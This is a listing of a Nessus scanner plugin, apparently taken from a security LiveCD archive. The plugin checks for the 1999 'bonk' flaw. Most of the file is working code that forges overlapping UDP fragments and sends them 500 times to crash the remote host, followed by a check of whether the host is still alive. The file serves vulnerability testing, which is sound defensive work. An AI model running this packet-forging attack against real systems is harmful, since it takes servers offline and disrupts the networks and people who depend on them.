home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / bonk.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  105 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10030);
  10.  script_version ("$Revision: 1.18 $");
  11.  script_cve_id("CAN-1999-0258");
  12.  name["english"] = "Bonk";
  13.  name["francais"] = "Bonk";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "It was possible
  17. to make the remote server crash
  18. using the 'bonk' attack. 
  19.  
  20. An attacker may use this flaw to
  21. shut down this server, thus 
  22. preventing your network from
  23. working properly.
  24.  
  25. Solution : contact your operating
  26. system vendor for a patch.
  27.  
  28. Risk factor : High";
  29.  
  30.  
  31.  desc["francais"] = "Il s'est avΘrΘ
  32. possible de faire planter la 
  33. machine distante en utilisant
  34. l'attaque 'bonk'. 
  35.  
  36. Un pirate peut utiliser cette
  37. attaque pour empecher votre
  38. rΘseau de fonctionner normallement.
  39.  
  40. Solution : contactez le vendeur
  41. de votre OS pour un patch.
  42.  
  43. Facteur de risque : ElevΘ";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Crashes the remote host using the 'bonk' attack";
  48.  summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'bonk'";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_KILL_HOST);
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  55.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  56.  family["english"] = "Denial of Service";
  57.  family["francais"] = "DΘni de service";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  
  60.  
  61.  exit(0);
  62. }
  63.  
  64. #
  65. # The script code starts here
  66. #
  67.  
  68.  
  69. if(islocalhost())exit(0);
  70. start_denial();
  71.  
  72.  
  73. PADDING = 0x1c;
  74. FRG_CONST = 0x3;
  75. sport = 123;
  76. dport = 321;
  77.  
  78. addr = this_host();
  79.  
  80. ip = forge_ip_packet(ip_v      : 4, 
  81.              ip_hl     : 5,
  82.              ip_len     : 20 + 8 + PADDING,
  83.              ip_id     : 0x455,
  84.              ip_p     : IPPROTO_UDP,
  85.              ip_tos    : 0,
  86.              ip_ttl     : 0x40,
  87.              ip_off     : IP_MF,
  88.              ip_src    : addr);
  89.  
  90. udp1 = forge_udp_packet( ip     : ip, uh_sport: sport, uh_dport: dport,
  91.              uh_ulen : 8 + PADDING, data:crap(PADDING));
  92.              
  93. ip = set_ip_elements(ip : ip, ip_off : FRG_CONST + 1, ip_len : 20 + FRG_CONST);
  94.  
  95. udp2 = forge_udp_packet(ip : ip,uh_sport : sport, uh_dport : dport,
  96.             uh_ulen : 8 + PADDING, data:crap(PADDING));
  97.             
  98. send_packet(udp1, udp2, pcap_active:FALSE) x 500;                         
  99. sleep(7);  # got false +ves at 5 seconds.
  100. alive = end_denial();
  101. if(!alive){
  102.                 set_kb_item(name:"Host/dead", value:TRUE);
  103.                 security_hole(port:0, protocol:"udp");
  104.                 }
  105.